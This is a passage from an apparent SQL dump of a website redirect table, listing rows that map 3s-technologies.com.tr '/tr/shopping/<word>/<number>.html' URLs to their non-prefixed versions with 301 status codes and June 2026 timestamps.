06:13:02','0000-00-00 00:00:00',301),(73994,'https://3s-technologies.com.tr/tr/shopping/catulus/4169342190.html',NULL,'https://3s-technologies.com.tr/shopping/catulus/4169342190.html','',1,0,'2026-06-11 06:13:06','0000-00-00 00:00:00',301),(73995,'https://3s-technologies.com.tr/tr/shopping/caseic/3930201770.html',NULL,'https://3s-technologies.com.tr/shopping/caseic/3930201770.html','',1,0,'2026-06-11 06:13:11','0000-00-00 00:00:00',301),(73996,'https://3s-technologies.com.tr/tr/shopping/suprascalpular/4186692309.html',NULL,'https://3s-technologies.com.tr/shopping/suprascalpular/4186692309.html','',1,0,'2026-06-11 06:13:15','0000-00-00 00:00:00',301),(73997,'https://3s-technologies.com.tr/tr/shopping/commonitive/2870250165.html',NULL,'https://3s-technologies.com.tr/shopping/commonitive/2870250165.html','',1,0,'2026-06-11 06:13:18','0000-00-00 00:00:00',301),(73998,'https://3s-technologies.com.tr/tr/shopping/guidelines/1508616962.html',NULL,'https://3s-technologies.com.tr/shopping/guidelines/1508616962.html','',1,0,'2026-06-11 06:13:22','0000-00-00 00:00:00',301),(73999,'https://3s-technologies.com.tr/tr/shopping/overlash/765112090.html',NULL,'https://3s-technologies.com.tr/shopping/overlash/765112090.html','',1,0,'2026-06-11 06:13:24','0000-00-00 00:00:00',301),(74000,'https://3s-technologies.com.tr/tr/shopping/hyaena/3975414415.html',NULL,'https://3s-technologies.com.tr/shopping/hyaena/3975414415.html','',1,0,'2026-06-11 06:13:27','0000-00-00 00:00:00',301),(74001,'https://3s-technologies.com.tr/tr/shopping/ichthyologist/890154441.html',NULL,'https://3s-technologies.com.tr/shopping/ichthyologist/890154441.html','',1,0,'2026-06-11 06:13:30','0000-00-00 00:00:00',301),(74002,'https://3s-technologies.com.tr/tr/shopping/timbering/1796368690.html',NULL,'https://3s-technologies.com.tr/shopping/timbering/1796368690.html','',1,0,'2026-06-11 06:13:33','0000-00-00 00:00:00',301),(74003,'https://3s-technologies.com.tr/tr/shopping/interposal/3323103531.html',NULL,'https://3s-technologies.com.tr/shopping/interposal/3323103531.html','',1,0,'2026-06-11 06:13:39','0000-00-00 00:00:00',301),(74004,'https://3s-technologies.com.tr/tr/shopping/brachet/3979400973.html',NULL,'https://3s-technologies.com.tr/shopping/brachet/3979400973.html','',1,0,'2026-06-11 06:13:41','0000-00-00 00:00:00',301),(74005,'https://3s-technologies.com.tr/tr/shopping/cloudlet/3943365920.html',NULL,'https://3s-technologies.com.tr/shopping/cloudlet/3943365920.html','',1,0,'2026-06-11 06:13:44','0000-00-00 00:00:00',301),(74006,'https://3s-technologies.com.tr/tr/shopping/repacify/2748462791.html',NULL,'https://3s-technologies.com.tr/shopping/repacify/2748462791.html','',1,0,'2026-06-11 06:13:47','0000-00-00 00:00:00',301),(74007,'https://3s-technologies.com.tr/tr/shopping/checkless/3501871901.html',NULL,'https://3s-technologies.com.tr/shopping/checkless/3501871901.html','',1,0,'2026-06-11 06:13:50','0000-00-00 00:00:00',301),(74008,'https://3s-technologies.com.tr/tr/shopping/renascent/3427250600.html',NULL,'https://3s-technologies.com.tr/shopping/renascent/3427250600.html','',1,0,'2026-06-11 06:13:53','0000-00-00 00:00:00',301),(74009,'https://3s-technologies.com.tr/tr/shopping/flittermouse/3030398293.html',NULL,'https://3s-technologies.com.tr/shopping/flittermouse/3030398293.html','',1,0,'2026-06-11 06:13:56','0000-00-00 00:00:00',301),(74010,'https://3s-technologies.com.tr/tr/shopping/comptly/1693826653.html',NULL,'https://3s-technologies.com.tr/shopping/comptly/1693826653.html','',1,0,'2026-06-11 06:13:59','0000-00-00 00:00:00',301),(74011,'https://3s-technologies.com.tr/tr/shopping/suavifying/511185417.html',NULL,'https://3s-technologies.com.tr/shopping/suavifying/511185417.html','',1,0,'2026-06-11 06:14:03','0000-00-00 00:00:00',301),(74012,'https://3s-technologies.com.tr/tr/shopping/atomicity/2434743787.html',NULL,'https://3s-technologies.com.tr/shopping/atomicity/2434743787.html','',1,0,'2026-06-11 06:14:05','0000-00-00 00:00:00',301),(74013,'https://3s-technologies.com.tr/tr/shopping/summitless/4074372665.html',NULL,'https://3s-technologies.com.tr/shopping/summitless/4074372665.html','',1,0,'2026-06-11 06:14:08','0000-00-00 00:00:00',301),(74014,'https://3s-technologies.com.tr/tr/shopping/comfrey/492454741.html',NULL,'https://3s-technologies.com.tr/shopping/comfrey/492454741.html','',1,0,'2026-06-11 06:14:11','0000-00-00 00:00:00',301),(74015,'https://3s-technologies.com.tr/tr/shopping/hematachometer/3361480482.html',NULL,'https://3s-technologies.com.tr/shopping/hematachometer/3361480482.html','',1,0,'2026-06-11 06:14:14','0000-00-00 00:00:00',301),(74016,'https://3s-technologies.com.tr/tr/shopping/abusiveness/640555176.html',NULL,'https://3s-technologies.com.tr/shopping/abusiveness/640555176.html','',1,0,'2026-06-11 06:14:18','0000-00-00 00:00:00',301),(74017,'https://3s-technologies.com.tr/tr/shopping/monarchically/1442384285.html',NULL,'https://3s-technologies.com.tr/shopping/monarchically/1442384285.html','',1,0,'2026-06-11 06:14:20','0000-00-00 00:00:00',301),(74018,'https://3s-technologies.com.tr/tr/shopping/rescuing/472208435.html',NULL,'https://3s-technologies.com.tr/shopping/rescuing/472208435.html','',1,0,'2026-06-11 06:14:23','0000-00-00 00:00:00',301),(74019,'https://3s-technologies.com.tr/tr/shopping/trying/1992501528.html',NULL,'https://3s-technologies.com.tr/shopping/trying/1992501528.html','',1,0,'2026-06-11 06:14:34','0000-00-00 00:00:00',301),(74020,'https://3s-technologies.com.tr/tr/shopping/inflection/620897636.html',NULL,'https://3s-technologies.com.tr/shopping/inflection/620897636.html','',1,0,'2026-06-11 06:14:36','0000-00-00 00:00:00',301),(74021,'https://3s-technologies.com.tr/tr/shopping/puppetish/196763590.html',NULL,'https://3s-technologies.com.tr/shopping/puppetish/196763590.html','',1,0,'2026-06-11 06:14:39','0000-00-00 00:00:00',301),(74022,'https://3s-technologies.com.tr/tr/shopping/spiritedness/96779979.html',NULL,'https://3s-technologies.com.tr/shopping/spiritedness/96779979.html','',1,0,'2026-06-11 06:14:42','0000-00-00 00:00:00',301),(74023,'https://3s-technologies.com.tr/tr/shopping/cleanly/974996098.html',NULL,'https://3s-technologies.com.tr/shopping/cleanly/974996098.html','',1,0,'2026-06-11 06:14:45','0000-00-00 00:00:00',301),(74024,'https://3s-technologies.com.tr/tr/shopping/idealities/464971835.html',NULL,'https://3s-technologies.com.tr/shopping/idealities/464971835.html','',1,0,'2026-06-11 06:14:48','0000-00-00 00:00:00',301),(74025,'https://3s-technologies.com.tr/tr/shopping/declinable/2258521327.html',NULL,'https://3s-technologies.com.tr/shopping/declinable/2258521327.html','',1,0,'2026-06-11 06:14:51','0000-00-00 00:00:00',301),(74026,'https://3s-technologies.com.tr/tr/shopping/settling/907673018.html',NULL,'https://3s-technologies.com.tr/shopping/settling/907673018.html','',1,0,'2026-06-11 06:14:54','0000-00-00 00:00:00',301),(74027,'https://3s-technologies.com.tr/tr/shopping/scaled/1875424670.html',NULL,'https://3s-technologies.com.tr/shopping/scaled/1875424670.html','',1,0,'2026-06-11 06:15:05','0000-00-00 00:00:00',301),(74028,'https://3s-technologies.com.tr/tr/shopping/bespitting/1034532434.html',NULL,'https://3s-technologies.com.tr/shopping/bespitting/1034532434.html','',1,0,'2026-06-11 06:15:08','0000-00-00 00:00:00',301),(74029,'https://3s-technologies.com.tr/tr/shopping/draining/1055427684.html',NULL,'https://3s-technologies.com.tr/shopping/draining/1055427684.html','',1,0,'2026-06-11 06:15:11','0000-00-00 00:00:00',301),(74030,'https://3s-technologies.com.tr/tr/shopping/converse/1683273455.html',NULL,'https://3s-technologies.com.tr/shopping/converse/1683273455.html','',1,0,'2026-06-11 06:15:14','0000-00-00 00:00:00',301),(74031,'https://3s-technologies.com.tr/tr/shopping/paragraphistical/886777752.html',NULL,'https://3s-technologies.com.tr/shopping/paragraphistical/886777752.html','',1,0,'2026-06-11 06:15:17','0000-00-00 00:00:00',301),(74032,'https://3s-technologies.com.tr/tr/shopping/pythagorizing/2542265362.html',NULL,'https://3s-technologies.com.tr/shopping/pythagorizing/2542265362.html','',1,0,'2026-06-11 06:15:20','0000-00-00 00:00:00',301),(74033,'https://3s-technologies.com.tr/tr/shopping/bribable/1365614607.html',NULL,'https://3s-technologies.com.tr/shopping/bribable/1365614607.html','',1,0,'2026-06-11 06:15:23','0000-00-00 00:00:00',301),(74034,'https://3s-technologies.com.tr/tr/shopping/vanquished/1489444859.html',NULL,'https://3s-technologies.com.tr/shopping/vanquished/1489444859.html','',1,0,'2026-06-11 06:15:26','0000-00-00 00:00:00',301),(74035,'https://3s-technologies.com.tr/tr/shopping/strangulate/925633038.html',NULL,'https://3s-technologies.com.tr/shopping/strangulate/925633038.html','',1,0,'2026-06-11 06:15:32','0000-00-00 00:00:00',301),(74036,'https://3s-technologies.com.tr/tr/shopping/passionless/4097080077.html',NULL,'https://3s-technologies.com.tr/shopping/passionless/4097080077.html','',1,0,'2026-06-11 06:15:35','0000-00-00 00:00:00',301),(74037,'https://3s-technologies.com.tr/tr/shopping/malinger/2944717373.html',NULL,'https://3s-technologies.com.tr/shopping/malinger/2944717373.html','',1,0,'2026-06-11 06:15:38','0000-00-00 00:00:00',301),(74038,'https://3s-technologies.com.tr/tr/shopping/subact/1407846550.html',NULL,'https://3s-technologies.com.tr/shopping/subact/1407846550.html','',1,0,'2026-06-11 06:15:41','0000-00-00 00:00:00',301),(74039,'https://3s-technologies.com.tr/tr/shopping/authenticly/3014464635.html',NULL,'https://3s-technologies.com.tr/shopping/authenticly/3014464635.html','',1,0,'2026-06-11 06:15:44','0000-00-00 00:00:00',301),(74040,'https://3s-technologies.com.tr/tr/shopping/thyoides/3570374683.html',NULL,'https://3s-technologies.com.tr/shopping/thyoides/3570374683.html','',1,0,'2026-06-11 06:15:47','0000-00-00 00:00:00',301),(74041,'https://3s-technologies.com.tr/tr/shopping/hashmark/1832240220.html',NULL,'https://3s-technologies.com.tr/shopping/hashmark/1832240220.html','',1,0,'2026-06-11 06:15:50','0000-00-00 00:00:00',301),(74042,'https://3s-technologies.com.tr/tr/shopping/goggleeye/1114924955.html',NULL,'https://3s-technologies.com.tr/shopping/goggleeye/1114924955.html','',1,0,'2026-06-11 06:15:53','0000-00-00 00:00:00',301),(74043,'https://3s-technologies.com.tr/tr/shopping/hexapterous/346075713.html',NULL,'https://3s-technologies.com.tr/shopping/hexapterous/346075713.html','',1,0,'2026-06-11 06:15:57','0000-00-00 00:00:00',301),(74044,'https://3s-technologies.com.tr/tr/shopping/scourge/1335934698.html',NULL,'https://3s-technologies.com.tr/shopping/scourge/1335934698.html','',1,0,'2026-06-11 06:15:59','0000-00-00 00:00:00',301),(74045,'https://3s-technologies.com.tr/tr/shopping/wildly/515774221.html',NULL,'https://3s-technologies.com.tr/shopping/wildly/515774221.html','',1,0,'2026-06-11 06:16:02','0000-00-00 00:00:00',301),(74046,'https://3s-technologies.com.tr/tr/shopping/arrogating/2206506826.html',NULL,'https://3s-technologies.com.tr/shopping/arrogating/2206506826.html','',1,0,'2026-06-11 06:16:05','0000-00-00 00:00:00',301),(74047,'https://3s-technologies.com.tr/tr/shopping/hemisect/1997090332.html',NULL,'https://3s-technologies.com.tr/shopping/hemisect/1997090332.html','',1,0,'2026-06-11 06:16:08','0000-00-00 00:00:00',301),(74048,'https://3s-technologies.com.tr/tr/shopping/roared/1972818361.html',NULL,'https://3s-technologies.com.tr/shopping/roared/1972818361.html','',1,0,'2026-06-11 06:16:11','0000-00-00 00:00:00',301),(74049,'https://3s-technologies.com.tr/tr/shopping/jumper/349452402.html',NULL,'https://3s-technologies.com.tr/shopping/jumper/349452402.html','',1,0,'2026-06-11 06:16:14','0000-00-00 00:00:00',301),(74050,'https://3s-technologies.com.tr/tr/shopping/duplexer/2844602604.html',NULL,'https://3s-technologies.com.tr/shopping/duplexer/2844602604.html','',1,0,'2026-06-11 06:16:17','0000-00-00 00:00:00',301),(74051,'https://3s-technologies.com.tr/tr/shopping/capsulate/1026281706.html',NULL,'https://3s-technologies.com.tr/shopping/capsulate/1026281706.html','',1,0,'2026-06-11 06:16:51','0000-00-00 00:00:00',301),(74052,'https://3s-technologies.com.tr/tr/shopping/faraday/3932504272.html',NULL,'https://3s-technologies.com.tr/shopping/faraday/3932504272.html','',1,0,'2026-06-11 06:16:54','0000-00-00 00:00:00',301),(74053,'https://3s-technologies.com.tr/tr/shopping/discoverable/3130207698.html',NULL,'https://3s-technologies.com.tr/shopping/discoverable/3130207698.html','',1,0,'2026-06-11 06:16:57','0000-00-00 00:00:00',301),(74054,'https://3s-technologies.com.tr/tr/shopping/ratifying/3602433000.html',NULL,'https://3s-technologies.com.tr/shopping/ratifying/3602433000.html','',1,0,'2026-06-11 06:17:00','0000-00-00 00:00:00',301),(74055,'https://3s-technologies.com.tr/tr/shopping/fraudfully/231609775.html',NULL,'https://3s-technologies.com.tr/shopping/fraudfully/231609775.html','',1,0,'2026-06-11 06:17:03','0000-00-00 00:00:00',301),(74056,'https://3s-technologies.com.tr/tr/shopping/devanagari/76655369.html',NULL,'https://3s-technologies.com.tr/shopping/devanagari/76655369.html','',1,0,'2026-06-11 06:17:06','0000-00-00 00:00:00',301),(74057,'https://3s-technologies.com.tr/tr/shopping/journalize/3043201467.html',NULL,'https://3s-technologies.com.tr/shopping/journalize/3043201467.html','',1,0,'2026-06-11 06:17:09','0000-00-00 00:00:00',301),(74058,'https://3s-technologies.com.tr/tr/shopping/hyperchloric/667116153.html',NULL,'https://3s-technologies.com.tr/shopping/hyperchloric/667116153.html','',1,0,'2026-06-11 06:17:12','0000-00-00 00:00:00',301),(74059,'https://3s-technologies.com.tr/tr/shopping/chantress/1237862807.html',NULL,'https://3s-technologies.com.tr/shopping/chantress/1237862807.html','',1,0,'2026-06-11 06:17:15','0000-00-00 00:00:00',301),(74060,'https://3s-technologies.com.tr/tr/shopping/sphinx/1098618477.html',NULL,'https://3s-technologies.com.tr/shopping/sphinx/1098618477.html','',1,0,'2026-06-11 06:17:18','0000-00-00 00:00:00',301),(74061,'https://3s-technologies.com.tr/tr/shopping/ichthyopsida/3499447687.html',NULL,'https://3s-technologies.com.tr/shopping/ichthyopsida/3499447687.html','',1,0,'2026-06-11 06:17:21','0000-00-00 00:00:00',301),(74062,'https://3s-technologies.com.tr/tr/shopping/pimploes/3683469918.html',NULL,'https://3s-technologies.com.tr/shopping/pimploes/3683469918.html','',1,0,'2026-06-11 06:17:24','0000-00-00 00:00:00',301),(74063,'https://3s-technologies.com.tr/tr/shopping/semispheric/3207220800.html',NULL,'https://3s-technologies.com.tr/shopping/semispheric/3207220800.html','',1,0,'2026-06-11 06:17:28','0000-00-00 00:00:00',301),(74064,'https://3s-technologies.com.tr/tr/shopping/indeterminately/947303879.html',NULL,'https://3s-technologies.com.tr/shopping/indeterminately/947303879.html','',1,0,'2026-06-11 06:17:30','0000-00-00 00:00:00',301),(74065,'https://3s-technologies.com.tr/tr/shopping/abruption/273487860.html',NULL,'https://3s-technologies.com.tr/shopping/abruption/273487860.html','',1,0,'2026-06-11 06:17:33','0000-00-00 00:00:00',301),(74066,'https://3s-technologies.com.tr/tr/shopping/leered/1755063595.html',NULL,'https://3s-technologies.com.tr/shopping/leered/1755063595.html','',1,0,'2026-06-11 06:17:36','0000-00-00 00:00:00',301),(74067,'https://3s-technologies.com.tr/tr/shopping/rigorously/1017018760.html',NULL,'https://3s-technologies.com.tr/shopping/rigorously/1017018760.html','',1,0,'2026-06-11 06:17:43','0000-00-00 00:00:00',301),(74068,'https://3s-technologies.com.tr/tr/shopping/scarifier/814475166.html',NULL,'https://3s-technologies.com.tr/shopping/scarifier/814475166.html','',1,0,'2026-06-11 06:17:46','0000-00-00 00:00:00',301),(74069,'https://3s-technologies.com.tr/tr/shopping/expiatorious/3826447650.html',NULL,'https://3s-technologies.com.tr/shopping/expiatorious/3826447650.html','',1,0,'2026-06-11 06:17:49','0000-00-00 00:00:00',301),(74070,'https://3s-technologies.com.tr/tr/shopping/blocklike/1562959544.html',NULL,'https://3s-technologies.com.tr/shopping/blocklike/1562959544.html','',1,0,'2026-06-11 06:17:52','0000-00-00 00:00:00',301),(74071,'https://3s-technologies.com.tr/tr/shopping/centigrade/409815006.html',NULL,'https://3s-technologies.com.tr/shopping/centigrade/409815006.html','',1,0,'2026-06-11 06:17:55','0000-00-00 00:00:00',301),(74072,'https://3s-technologies.com.tr/tr/shopping/rhapsodically/1668213683.html',NULL,'https://3s-technologies.com.tr/shopping/rhapsodically/1668213683.html','',1,0,'2026-06-11 06:17:59','0000-00-00 00:00:00',301),(74073,'https://3s-technologies.com.tr/tr/shopping/frena/258469451.html',NULL,'https://3s-technologies.com.tr/shopping/frena/258469451.html','',1,0,'2026-06-11 06:18:01','0000-00-00 00:00:00',301),(74074,'https://3s-technologies.com.tr/tr/shopping/passman/717219355.html',NULL,'https://3s-technologies.com.tr/shopping/passman/717219355.html','',1,0,'2026-06-11 06:18:04','0000-00-00 00:00:00',301),(74075,'https://3s-technologies.com.tr/tr/shopping/snite/735041447.html',NULL,'https://3s-technologies.com.tr/shopping/snite/735041447.html','',1,0,'2026-06-11 06:18:07','0000-00-00 00:00:00',301),(74076,'https://3s-technologies.com.tr/tr/shopping/procumbens/264192169.html',NULL,'https://3s-technologies.com.tr/shopping/procumbens/264192169.html','',1,0,'2026-06-11 06:18:10','0000-00-00 00:00:00',301),(74077,'https://3s-technologies.com.tr/tr/shopping/earthed/3384673299.html',NULL,'https://3s-technologies.com.tr/shopping/earthed/3384673299.html','',1,0,'2026-06-11 06:18:13','0000-00-00 00:00:00',301),(74078,'https://3s-technologies.com.tr/tr/shopping/delapsation/383433649.html',NULL,'https://3s-technologies.com.tr/shopping/delapsation/383433649.html','',1,0,'2026-06-11 06:18:16','0000-00-00 00:00:00',301),(74079,'https://3s-technologies.com.tr/tr/shopping/impenned/53761235.html',NULL,'https://3s-technologies.com.tr/shopping/impenned/53761235.html','',1,0,'2026-06-11 06:18:19','0000-00-00 00:00:00',301),(74080,'https://3s-technologies.com.tr/tr/shopping/platly/2969808478.html',NULL,'https://3s-technologies.com.tr/shopping/platly/2969808478.html','',1,0,'2026-06-11 06:18:25','0000-00-00 00:00:00',301),(74081,'https://3s-technologies.com.tr/tr/shopping/collutory/495831430.html',NULL,'https://3s-technologies.com.tr/shopping/collutory/495831430.html','',1,0,'2026-06-11 06:18:29','0000-00-00 00:00:00',301),(74082,'https://3s-technologies.com.tr/tr/shopping/affluency/1833192695.html',NULL,'https://3s-technologies.com.tr/shopping/affluency/1833192695.html','',1,0,'2026-06-11 06:18:32','0000-00-00 00:00:00',301),(74083,'https://3s-technologies.com.tr/tr/shopping/foreman/4042737463.html',NULL,'https://3s-technologies.com.tr/shopping/foreman/4042737463.html','',1,0,'2026-06-11 06:18:35','0000-00-00 00:00:00',301),(74084,'https://3s-technologies.com.tr/tr/shopping/subgroup/3684682017.html',NULL,'https://3s-technologies.com.tr/shopping/subgroup/3684682017.html','',1,0,'2026-06-11 06:18:38','0000-00-00 00:00:00',301),(74085,'https://3s-technologies.com.tr/tr/shopping/moonsplashed/3537090858.html',NULL,'https://3s-technologies.com.tr/shopping/moonsplashed/3537090858.html','',1,0,'2026-06-11 06:18:41','0000-00-00 00:00:00',301),(74086,'https://3s-technologies.com.tr/tr/shopping/suspicable/2901369384.html',NULL,'https://3s-technologies.com.tr/shopping/suspicable/2901369384.html','',1,0,'2026-06-11 06:18:44','0000-00-00 00:00:00',301),(74087,'https://3s-technologies.com.tr/tr/shopping/falsify/3845619737.html',NULL,'https://3s-technologies.com.tr/shopping/falsify/3845619737.html','',1,0,'2026-06-11 06:18:47','0000-00-00 00:00:00',301),(74088,'https://3s-technologies.com.tr/tr/shopping/maturity/3291546482.html',NULL,'https://3s-technologies.com.tr/shopping/maturity/3291546482.html','',1,0,'2026-06-11 06:18:50','0000-00-00 00:00:00',301),(74089,'https://3s-technologies.com.tr/tr/shopping/reckoner/1014407840.html',NULL,'https://3s-technologies.com.tr/shopping/reckoner/1014407840.html','',1,0,'2026-06-11 06:18:53','0000-00-00 00:00:00',301),(74090,'https://3s-technologies.com.tr/tr/shopping/beemaster/834763267.html',NULL,'https://3s-technologies.com.tr/shopping/beemaster/834763267.html','',1,0,'2026-06-11 06:18:56','0000-00-00 00:00:00',301),(74091,'https://3s-technologies.com.tr/tr/shopping/donation/3088097451.html',NULL,'https://3s-technologies.com.tr/shopping/donation/3088097451.html','',1,0,'2026-06-11 06:18:59','0000-00-00 00:00:00',301),(74092,'https://3s-technologies.com.tr/tr/shopping/struthious/354651043.html',NULL,'https://3s-technologies.com.tr/shopping/struthious/354651043.html','',1,0,'2026-06-11 06:19:02','0000-00-00 00:00:00',301),(74093,'https://3s-technologies.com.tr/tr/shopping/learnedly/2882202200.html',NULL,'https://3s-technologies.com.tr/shopping/learnedly/2882202200.html','',1,0,'2026-06-11 06:19:05','0000-00-00 00:00:00',301),(74094,'https://3s-technologies.com.tr/tr/shopping/furacity/225336899.html',NULL,'https://3s-technologies.com.tr/shopping/furacity/225336899.html','',1,0,'2026-06-11 06:19:08','0000-00-00 00:00:00',301),(74095,'https://3s-technologies.com.tr/tr/shopping/queenpost/3047790255.html',NULL,'https://3s-technologies.com.tr/shopping/queenpost/3047790255.html','',1,0,'2026-06-11 06:19:11','0000-00-00 00:00:00',301),(74096,'https://3s-technologies.com.tr/tr/shopping/nucleolated/3346864406.html',NULL,'https://3s-technologies.com.tr/shopping/nucleolated/3346864406.html','',1,0,'2026-06-11 06:19:18','0000-00-00 00:00:00',301),(74097,'https://3s-technologies.com.tr/tr/shopping/solicitress/1002297201.html',NULL,'https://3s-technologies.com.tr/shopping/solicitress/1002297201.html','',1,0,'2026-06-11 06:19:21','0000-00-00 00:00:00',301),(74098,'https://3s-technologies.com.tr/tr/shopping/individualizer/4161815420.html',NULL,'https://3s-technologies.com.tr/shopping/individualizer/4161815420.html','',1,0,'2026-06-11 06:19:24','0000-00-00 00:00:00',301),(74099,'https://3s-technologies.com.tr/tr/shopping/cinder/2007041284.html',NULL,'https://3s-technologies.com.tr/shopping/cinder/2007041284.html','',1,0,'2026-06-11 06:19:27','0000-00-00 00:00:00',301),(74100,'https://3s-technologies.com.tr/tr/shopping/dayboy/460219508.html',NULL,'https://3s-technologies.com.tr/shopping/dayboy/460219508.html','',1,0,'2026-06-11 06:19:30','0000-00-00 00:00:00',301),(74101,'https://3s-technologies.com.tr/tr/shopping/thinned/2637450904.html',NULL,'https://3s-technologies.com.tr/shopping/thinned/2637450904.html','',1,0,'2026-06-11 06:19:33','0000-00-00 00:00:00',301),(74102,'https://3s-technologies.com.tr/tr/shopping/crowbar/330544810.html',NULL,'https://3s-technologies.com.tr/shopping/crowbar/330544810.html','',1,0,'2026-06-11 06:19:36','0000-00-00 00:00:00',301),(74103,'https://3s-technologies.com.tr/tr/shopping/movement/3493699342.html',NULL,'https://3s-technologies.com.tr/shopping/movement/3493699342.html','',1,0,'2026-06-11 06:19:39','0000-00-00 00:00:00',301),(74104,'https://3s-technologies.com.tr/tr/shopping/polymyoid/3212925602.html',NULL,'https://3s-technologies.com.tr/shopping/polymyoid/3212925602.html','',1,0,'2026-06-11 06:19:42','0000-00-00 00:00:00',301),(74105,'https://3s-technologies.com.tr/tr/shopping/jacobin/4246233580.html',NULL,'https://3s-technologies.com.tr/shopping/jacobin/4246233580.html','',1,0,'2026-06-11 06:19:45','0000-00-00 00:00:00',301),(74106,'https://3s-technologies.com.tr/tr/shopping/outfall/2418605735.html',NULL,'https://3s-technologies.com.tr/shopping/outfall/2418605735.html','',1,0,'2026-06-11 06:19:48','0000-00-00 00:00:00',301),(74107,'https://3s-technologies.com.tr/tr/shopping/phyllium/3547644056.html',NULL,'https://3s-technologies.com.tr/shopping/phyllium/3547644056.html','',1,0,'2026-06-11 06:19:51','0000-00-00 00:00:00',301),(74108,'https://3s-technologies.com.tr/tr/shopping/aright/2287152628.html',NULL,'https://3s-technologies.com.tr/shopping/aright/2287152628.html','',1,0,'2026-06-11 06:19:54','0000-00-00 00:00:00',301),(74109,'https://3s-technologies.com.tr/tr/shopping/gayer/650368248.html',NULL,'https://3s-technologies.com.tr/shopping/gayer/650368248.html','',1,0,'2026-06-11 06:19:57','0000-00-00 00:00:00',301),(74110,'https://3s-technologies.com.tr/tr/shopping/yeldrin/4163191042.html',NULL,'https://3s-technologies.com.tr/shopping/yeldrin/4163191042.html','',1,0,'2026-06-11 06:20:00','0000-00-00 00:00:00',301),(74111,'https://3s-technologies.com.tr/tr/shopping/asseverating/457795326.html',NULL,'https://3s-technologies.com.tr/shopping/asseverating/457795326.html','',1,0,'2026-06-11 06:20:03','0000-00-00 00:00:00',301),(74112,'https://3s-technologies.com.tr/tr/shopping/pointel/4156059925.html',NULL,'https://3s-technologies.com.tr/shopping/pointel/4156059925.html','',1,0,'2026-06-11 06:20:06','0000-00-00 00:00:00',301),(74113,'https://3s-technologies.com.tr/tr/shopping/cleanliest/2067953592.html',NULL,'https://3s-technologies.com.tr/shopping/cleanliest/2067953592.html','',1,0,'2026-06-11 06:20:09','0000-00-00 00:00:00',301),(74114,'https://3s-technologies.com.tr/tr/shopping/uplift/1033320335.html',NULL,'https://3s-technologies.com.tr/shopping/uplift/1033320335.html','',1,0,'2026-06-11 06:20:12','0000-00-00 00:00:00',301),(74115,'https://3s-technologies.com.tr/tr/shopping/sanctifier/249894089.html',NULL,'https://3s-technologies.com.tr/shopping/sanctifier/249894089.html','',1,0,'2026-06-11 06:20:15','0000-00-00 00:00:00',301),(74116,'https://3s-technologies.com.tr/tr/shopping/aggregate/2252720424.html',NULL,'https://3s-technologies.com.tr/shopping/aggregate/2252720424.html','',1,0,'2026-06-11 06:20:18','0000-00-00 00:00:00',301),(74117,'https://3s-technologies.com.tr/tr/shopping/diggable/4234118006.html',NULL,'https://3s-technologies.com.tr/shopping/diggable/4234118006.html','',1,0,'2026-06-11 06:20:21','0000-00-00 00:00:00',301),(74118,'https://3s-technologies.com.tr/tr/shopping/bacteriologist/2182842020.html',NULL,'https://3s-technologies.com.tr/shopping/bacteriologist/2182842020.html','',1,0,'2026-06-11 06:20:24','0000-00-00 00:00:00',301),(74119,'https://3s-technologies.com.tr/tr/shopping/hungered/1993713643.html',NULL,'https://3s-technologies.com.tr/shopping/hungered/1993713643.html','',1,0,'2026-06-11 06:20:27','0000-00-00 00:00:00',301),(74120,'https://3s-technologies.com.tr/tr/shopping/sculler/2531481867.html',NULL,'https://3s-technologies.com.tr/shopping/sculler/2531481867.html','',1,0,'2026-06-11 06:20:30','0000-00-00 00:00:00',301),(74121,'https://3s-technologies.com.tr/tr/shopping/bases/3814336995.html',NULL,'https://3s-technologies.com.tr/shopping/bases/3814336995.html','',1,0,'2026-06-11 06:20:34','0000-00-00 00:00:00',301),(74122,'https://3s-technologies.com.tr/tr/shopping/commoving/3494695392.html',NULL,'https://3s-technologies.com.tr/shopping/commoving/3494695392.html','',1,0,'2026-06-11 06:20:36','0000-00-00 00:00:00',301),(74123,'https://3s-technologies.com.tr/tr/shopping/parcheesi/472330147.html',NULL,'https://3s-technologies.com.tr/shopping/parcheesi/472330147.html','',1,0,'2026-06-11 06:20:39','0000-00-00 00:00:00',301),(74124,'https://3s-technologies.com.tr/tr/shopping/bolograph/1239196618.html',NULL,'https://3s-technologies.com.tr/shopping/bolograph/1239196618.html','',1,0,'2026-06-11 06:20:42','0000-00-00 00:00:00',301),(74125,'https://3s-technologies.com.tr/tr/shopping/malonate/31653886.html',NULL,'https://3s-technologies.com.tr/shopping/malonate/31653886.html','',1,0,'2026-06-11 06:20:45','0000-00-00 00:00:00',301),(74126,'https://3s-technologies.com.tr/tr/shopping/poulder/3884215399.html',NULL,'https://3s-technologies.com.tr/shopping/poulder/3884215399.html','',1,0,'2026-06-11 06:20:48','0000-00-00 00:00:00',301),(74127,'https://3s-technologies.com.tr/tr/shopping/overarch/3070019316.html',NULL,'https://3s-technologies.com.tr/shopping/overarch/3070019316.html','',1,0,'2026-06-11 06:20:51','0000-00-00 00:00:00',301),(74128,'https://3s-technologies.com.tr/tr/shopping/sternite/1906480169.html',NULL,'https://3s-technologies.com.tr/shopping/sternite/1906480169.html','',1,0,'2026-06-11 06:20:54','0000-00-00 00:00:00',301),(74129,'https://3s-technologies.com.tr/tr/shopping/mormon/197716097.html',NULL,'https://3s-technologies.com.tr/shopping/mormon/197716097.html','',1,0,'2026-06-11 06:20:57','0000-00-00 00:00:00',301),(74130,'https://3s-technologies.com.tr/tr/shopping/alternately/3046699868.html',NULL,'https://3s-technologies.com.tr/shopping/alternately/3046699868.html','',1,0,'2026-06-11 06:21:00','0000-00-00 00:00:00',301),(74131,'https://3s-technologies.com.tr/tr/shopping/decomposable/3688222213.html',NULL,'https://3s-technologies.com.tr/shopping/decomposable/3688222213.html','',1,0,'2026-06-11 06:21:03','0000-00-00 00:00:00',301),(74132,'https://3s-technologies.com.tr/tr/shopping/bossed/3073559528.html',NULL,'https://3s-technologies.com.tr/shopping/bossed/3073559528.html','',1,0,'2026-06-11 06:21:06','0000-00-00 00:00:00',301),(74133,'https://3s-technologies.com.tr/tr/shopping/piles/4040149758.html',NULL,'https://3s-technologies.com.tr/shopping/piles/4040149758.html','',1,0,'2026-06-11 06:21:09','0000-00-00 00:00:00',301),(74134,'https://3s-technologies.com.tr/tr/shopping/indomptable/3097275011.html',NULL,'https://3s-technologies.com.tr/shopping/indomptable/3097275011.html','',1,0,'2026-06-11 06:21:12','0000-00-00 